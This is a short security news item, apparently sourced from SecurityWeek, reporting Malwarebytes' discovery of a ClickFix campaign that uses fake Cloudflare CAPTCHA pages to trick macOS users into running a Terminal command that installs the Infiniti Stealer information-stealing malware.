180/69 Monday, March 30, 2026
Security researchers at Malwarebytes have reported a new ClickFix campaign targeting macOS users by impersonating Cloudflare verification pages to distribute a Python-based information-stealing malware. The attack begins by luring victims to a fake CAPTCHA page that closely mimics legitimate Cloudflare verification. It then uses social engineering techniques to trick users into copying and executing a command in their Terminal. The ClickFix technique has been widely used since August 2024, primarily targeting Windows users, but in recent months it has evolved to more convincingly target macOS users.
Once the command is executed, a Bash script is downloaded from an external server. The script decodes an embedded payload and writes a binary file into a temporary directory, removing file attributes before execution. The dropped binary is a loader compiled using Nuitka, a tool that converts Python code into binaries, making static analysis more difficult. The loader then extracts and executes the final payload known as Infiniti Stealer.
Infiniti Stealer is capable of exfiltrating a wide range of sensitive data, including browser credentials, Keychain data, cryptocurrency wallets, developer-related secrets, and screenshots captured during operation. The stolen data is transmitted to a command-and-control (C2) server via HTTP POST requests and notifications are sent through Telegram channels. Additionally, the malware employs evasion techniques such as randomized execution delays and environment checks to detect analysis or sandbox environments. Experts note that this campaign represents an evolution of techniques previously effective against Windows users, now adapted for macOS with increased sophistication in evasion and analysis resistance.
Source https://www.securityweek.com/cloudflare-themed-clickfix-attack-drops-infiniti-stealer-on-macs/